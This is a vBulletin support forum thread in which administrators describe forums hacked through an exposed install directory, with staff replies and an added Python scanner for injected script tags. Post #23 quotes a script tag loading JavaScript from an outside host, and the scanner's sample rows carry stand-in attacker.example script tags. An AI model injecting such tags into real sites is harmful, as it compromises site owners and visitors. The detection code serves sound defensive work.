4.1.1 Forum HACKED by Syrian Sympathizers

  • Tony
    Senior Member
    • Feb 2001
    • 573
    • 3.6.x

    #16
    I was hacked also last night. My host said this:

    It appears this was a typical post sent to the ajax on the back-end. These are taken care of by normal ModSecurity rules, but ModSecurity rules were set to defaults. As such, I've enabled additional ModSecurity rules to protect against this and many other common attack types, so this exact issue shouldn't happen again.



    Here's the POST performed by that user:



    "POST /forum/acp1/ajax.php


    • rgvtruck
      New Member
      • Oct 2007
      • 19

      #17
      Sorry for hijacking the thread, but I was also hacked. My site is working, but right now when I was in AdminCP I clicked one of the help icons and it took me to a "team hacker egypt" directory on my server. What should I do now??


      • Richard Tafoya
        Member
        • Apr 2000
        • 72

        #18
        Got a return hack today as well. I keep circling back to the question of how vBulletin could ship commercial software with such a gaping security hole.


        • Allthumbz
          Senior Member
          • Oct 2011
          • 190

          #19
          This happened to me tonight and I tried to clear this by upgrading to 4.2.2 and all heck broke loose and I got errors all over the place. What can I do now? Thanks.
          Nelson
          www.Hobby-Machinist.com


          • Allthumbz
            Senior Member
            • Oct 2011
            • 190

            #20
            Originally posted by Richard Tafoya
            Got a return hack today as well. I keep circling back to the question of how vBulletin could ship commercial software with such a gaping security hole.
            And no email was sent to EVERY owner whose email address they have in their files warning to REMOVE the INSTALL directory BEFORE we were all hacked. By the time I got the message in the Admincp, the SEA had already hacked my site. To be clear, I don't blame the mods here or the support staff, they did their best to help us afterwards, and they did. What was management thinking in NOT contacting everyone beforehand? I was up till 5am restoring the site and working to fix the damage.
            Nelson
            www.Hobby-Machinist.com


            • Wayne Luke
              vBulletin Technical Support Lead
              • Aug 2000
              • 74123

              #21
              Originally posted by helal_ph
              Now I have some questions:
              1. How can someone reach the install folder without knowing my FTP username and password?
              2. If they can reach the AdminCP, can they reach this install folder?
              3. If the install folder has no value, why did the vBulletin team not instruct us to delete it after installation? They instruct us to delete only install.php.

              thank you
              1) It has nothing to do with FTP... Delete the FOLDER. It is the only way to prevent access.

              2) Yes... If it is on your server they can reach it. This is why in no uncertain terms you should delete the folder like we've told you to do so.

              3) It has value. However all instructions have been updated to delete the folder. You should do so immediately.
              Translations provided by Google.

              Wayne Luke
              The Rabid Badger - a vBulletin Cloud demonstration site.
              vBulletin 5 API


              • Wayne Luke
                vBulletin Technical Support Lead
                • Aug 2000
                • 74123

                #22
                Originally posted by Allthumbz

                And no email was sent to EVERY owner whose email address they have in their files warning to REMOVE the INSTALL directory BEFORE we were all hacked. By the time I got the message in the Admincp, the SEA had already hacked my site. To be clear, I don't blame the mods here or the support staff, they did their best to help us afterwards, and they did. What was management thinking in NOT contacting everyone beforehand? I was up till 5am restoring the site and working to fix the damage.
                The issue was introduced in 4.1.0. That was released over 3 years ago. Even if we had emailed before we confirmed it, your site was already at risk. As it is, most people are simply disregarding the email anyway.
                Translations provided by Google.

                Wayne Luke
                The Rabid Badger - a vBulletin Cloud demonstration site.
                vBulletin 5 API


                • Mary303
                  Senior Member
                  • Oct 2006
                  • 363
                  • 4.0.x

                  #23
                  Just reporting that this morning, Sunday Sep. 15, my forum 4.2.0 PL 2 was also hacked.

                  At this point it should be fine for me to deal with ... just reporting. I will stage the latest 4 version and switch everything to the new files.

                  BUT ... how can I be sure that the problem is really fixed, even with the upgrade to 4.2.1?

                  The hacker used the username "lasttouch". lasttouch apparently registered as there is a registration date of today about 7 am ET, then accessed the Admin CP and promoted itself to Admin. Found some "hacker login code" as well that was the way into the Admin CP, I'm guessing.

                  I am not a hacker myself so I don't really know what I'm looking for ... I haven't really investigated thoroughly, but so far all I've found is that the
                  Admin CP > Settings > Options > Site Name / URL / Contact > "Forum Name" box
                  was filled with this script (I added [invalidating code] just in case):

                  <script [invalidating code] src="http://kenningautoglass.co.za/wp-content/themes/famous/megaframe/megapanel/inc/lasttouch.js"></script>

                  So ... the hacker interfered with access, displayed a sort of medieval crest image that is so small and pixelated I can't read it, and a message "lasttouch was here".

                  Advice on making sure the LATEST version vb is secure is most welcome.


                  • Allthumbz
                    Senior Member
                    • Oct 2011
                    • 190

                    #24
                    One related question. If you remove install, you cannot run the fix unique index function in maintenance. You get this error:
                    Help
                    Fix Unique Indexes
                    If for whatever reason the UNIQUE indexes in your database have been lost (usually this happens after importing an incomplete or corrupt SQL dump) you may find strange behavior, particularly when using the language and template systems.

                    This system will attempt to correct the problem and rebuild your UNIQUE indexes.

                    Please ensure that the mysql-schema.php file is present in the install folder on your web server before continuing.
                    Nelson
                    www.Hobby-Machinist.com


                    • DannyITR
                      Senior Member
                      • Jan 2002
                      • 785

                      #25
                      Was hacked today. Second time in a week. The first time it was the Syrians and they put up a notice. I didn't delete the install directory, unfortunately. This time I cannot seem to get the hacker message off the forum home.

                      -uploaded all new files
                      -deleted all new admin accounts
                      -deleted install dir
                      -checked modified files on server - nothing from this week
                      -checked announcements and notices and there is nothing new
                      -checked site name / URL / contact details page nothing there.
                      -disabled all plugins

                      My forum homepage is still the hacker message. How did he do this?

                      Edit: found some suspicious plugins in the vBulletin product and deleted them. Message still there.

                      Edit: It was the style that was edited. I reverted to another style and it got rid of the message.
                      Last edited by DannyITR; Thu 19 Sep '13, 8:34am.
                      Danny
                      My Site ---->www.montrealracing.com



                      • GuitarsCanada
                        GuitarsCanada commented
                        I was just hacked by these syrians as well, wiped me clean, all files deleted except for some kind of page they put up. I am wiped clean
                    • Wayne Luke
                      vBulletin Technical Support Lead
                      • Aug 2000
                      • 74123

                      #26
                      Edit your FORUMHOME template and check it for extra code. If no extra code, just save it anyway.
                      Translations provided by Google.

                      Wayne Luke
                      The Rabid Badger - a vBulletin Cloud demonstration site.
                      vBulletin 5 API

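A check for the two kinds of tampering reported above, the script tag injected into the Forum Name setting (#23) and extra code in the FORUMHOME template (#26), written here as an added example and not vBulletin's own code: it takes rows exported from the `setting` and `template` tables and flags any script tag in a plain-text setting, and any template script loaded from a host outside a trusted list. The trusted hosts, the attacker hostname and the sample rows are constructed; `bbtitle` is assumed to be the varname of the Forum Name setting.

```python
import re
from urllib.parse import urlparse

# Hosts this forum legitimately loads scripts from (assumed values; set your own).
TRUSTED_HOSTS = {"www.example-forum.com", "ajax.googleapis.com"}

SCRIPT_TAG = re.compile(r"<script\b[^>]*>", re.IGNORECASE)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def find_injected_scripts(rows, trusted_hosts=TRUSTED_HOSTS):
    """rows: (table, name, text) triples as read from vBulletin's `setting`
    and `template` tables. Returns (table, name, reason) for each suspicious row.
    A plain-text setting such as the Forum Name should never hold a <script>
    tag at all; a template may, but only same-origin or from a trusted host."""
    hits = []
    for table, name, text in rows:
        for tag in SCRIPT_TAG.finditer(text):
            m = SRC_ATTR.search(tag.group(0))
            # urlparse also resolves protocol-relative "//host/x.js" forms;
            # relative paths and inline blocks yield host None (same-origin).
            host = urlparse(m.group(1)).hostname if m else None
            if table == "setting":
                hits.append((table, name, "script tag in a plain-text setting"))
            elif host and host.lower() not in trusted_hosts:
                hits.append((table, name, f"template loads script from {host}"))
    return hits


# Constructed sample rows modelled on the thread: the Forum Name setting and the
# FORUMHOME template carrying an injected tag, beside two clean default rows.
SAMPLE_ROWS = [
    ("setting", "bbtitle",
     '<script [invalidating code] src="http://attacker.example/lasttouch.js"></script>'),
    ("setting", "hometitle", "Hobby Forum"),
    ("template", "FORUMHOME",
     '{vb:raw header}<script type="text/javascript" src="//attacker.example/lt.js"></script>'),
    ("template", "headinclude",
     '<script type="text/javascript" src="clientscript/vbulletin-core.js"></script>'
     '<script type="text/javascript">var SESSIONURL = "{vb:raw session.sessionurl}";</script>'),
]

if __name__ == "__main__":
    for table, name, reason in find_injected_scripts(SAMPLE_ROWS):
        print(f"{table}.{name}: {reason}")
```

Run it against a dump of the two tables (for example `SELECT varname, value FROM setting` and `SELECT title, template FROM template`) after an incident; a clean forum produces no output.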

                      • kjh411
                        Senior Member
                        • May 2007
                        • 194
                        • 3.7.x

                        #27
                        I got hacked today. They deleted everything in my public_html directory and uploaded a bunch of their own files, which I suspect allowed others access.

                        The files they left were named:
                        index.php
                        cx.php
                        xxx.php (which appears to be some sort of access panel for my server!)
                        inbox php mailer 2013.php

                        See attached image of my hacked homepage.

                        I have a dedicated server with a bunch of different domains and sites including another vbulletin 4.x site.

                        The other vBulletin 4.x site was not defaced or visibly damaged, but they also managed to access cPanel for both domains that have the vBulletin 4.x sites and used the other domain to send out spam, but the email addresses they were sending to do not appear to be our forum members.

                        I'm not sure what version of vbulletin was running on the site they deleted but I think it was below 4.2.1. The other site is running 4.2.0 PL2

                        In both cases the install directory was NOT present (we were hacked previously and learned from that!).

                        The database belonging to the site that they deleted is still in place and it is reasonably easy to restore that site, but could they have left some sort of back door in the database?

                        Ditto for the site that is still intact - I am concerned that they may have left some sort of back door for later.
